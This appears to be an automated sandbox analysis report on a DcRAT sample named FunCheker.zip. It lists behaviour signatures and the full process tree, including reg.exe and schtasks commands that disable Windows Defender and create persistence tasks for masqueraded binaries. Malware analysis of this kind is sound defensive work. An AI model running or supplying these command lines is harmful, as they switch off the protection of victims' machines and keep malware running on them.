Analysis Overview
SHA256
0cf56a65f8c8d0147fae630441e029d4c0c739ddf1198e8f4eedb1778fe16ed9
Threat Level: Known bad
The file FunCheker.zip was found to be: Known bad.
Malicious Activity Summary
Process spawned unexpected child process
Modifies Windows Defender Real-time Protection settings
Modifies security service
DcRat
DCRat payload
Checks computer location settings
Executes dropped EXE
Loads dropped DLL
Drops file in Windows directory
Drops file in Program Files directory
Enumerates physical storage devices
Unsigned PE
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Enumerates system info in registry
Modifies registry class
Suspicious use of FindShellTrayWindow
Scheduled Task/Job: Scheduled Task
Suspicious use of SendNotifyMessage
Uses Task Scheduler COM API
Suspicious behavior: EnumeratesProcesses
Delays execution with timeout.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-07-22 19:12
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-22 19:12
Reported
2024-07-22 19:30
Platform
win7-20240704-en
Max time kernel
1050s
Max time network
725s
Command Line
Signatures
DcRat
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Windows\system32\reg.exe | N/A |
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" | C:\Windows\system32\reg.exe | N/A |
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
DCRat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\Windows Defender\es-ES\cmd.exe | C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe | N/A |
| File created | C:\Program Files (x86)\Windows Defender\es-ES\ebf1f9fa8afd6d | C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Help\csrss.exe | C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe | N/A |
| File created | C:\Windows\Help\886983d96e3d3e | C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe | N/A |
| File created | C:\Windows\L2Schemas\csrss.exe | C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe | N/A |
| File created | C:\Windows\L2Schemas\886983d96e3d3e | C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe | N/A |
Enumerates physical storage devices
Scheduled Task/Job: Scheduled Task
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Default User\System.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\FunCheker.exe
"C:\Users\Admin\AppData\Local\Temp\FunCheker.exe"
C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe
"C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe"
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\clear_av.bat" "
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\FunChecker .bat" "
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\avdisable.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\kXeJA.vbe"
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\ZqKnM.bat" "
C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe
"C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 14 /tr "'C:\Users\Default User\sppsvc.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Users\Default User\sppsvc.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\sppsvc.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 14 /tr "'C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 13 /tr "'C:\Windows\L2Schemas\csrss.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Windows\L2Schemas\csrss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 14 /tr "'C:\Windows\L2Schemas\csrss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 11 /tr "'C:\Users\Default User\System.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Users\Default User\System.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 8 /tr "'C:\Users\Default User\System.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 5 /tr "'C:\Windows\Help\csrss.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Windows\Help\csrss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 12 /tr "'C:\Windows\Help\csrss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 11 /tr "'C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 9 /tr "'C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 7 /tr "'C:\Users\Default User\Idle.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Users\Default User\Idle.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 9 /tr "'C:\Users\Default User\Idle.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 11 /tr "'C:\Users\Admin\csrss.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Users\Admin\csrss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\Users\Admin\csrss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Windows Defender\es-ES\cmd.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Defender\es-ES\cmd.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Windows Defender\es-ES\cmd.exe'" /rl HIGHEST /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\CbarT2SBYT.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\syYKg8QxNI.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\SaOkt9ru2m.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\8RIE4o2SCx.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\QRlBHoY6P9.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\gPrDhQDX5J.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\1F0LTC0kP2.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\fmTXnddwCX.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\b7oBPqXqtO.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\aWJwCUxpp4.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\UucX7bnqC8.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\FIx4sKIZfl.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\EYKlAcFNfO.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\SaOkt9ru2m.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\KxKP0srito.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\L9j9zErPDE.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\eNTIt1NKYH.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\sPXGbYzrvf.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\0P1AeAAEDQ.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\xjNnGM38uG.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\uuaNNDTqg5.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\dgWvFyiHB2.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\tebxeZNirC.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\uxMZkGAiOs.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\WVE2eLfZN7.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\C0VS1u4WCC.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\jnfhf9Euk8.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\wpigNgqS7W.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\aJcBxrOCPY.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\EtrZeLjFvq.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\jkzlbVqk90.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\iu0amT0ExO.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ww4YVzclJm.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\vCRFnHZZKP.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\QwDZd8tkMK.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\IJ9EkrtYDM.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\qzxbGmHcY3.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\eNTIt1NKYH.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\UZ6jdsJyxg.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Mw1PlbJmoj.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\YwiSfj46e4.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\f4KPDhjeqr.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\8t4fMT0wY0.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\KtkjGbmHOL.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\T3kbcxG26A.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\hfpeQ4JfvC.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ATZuYpZxcK.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\2qVagYZlTM.bat"
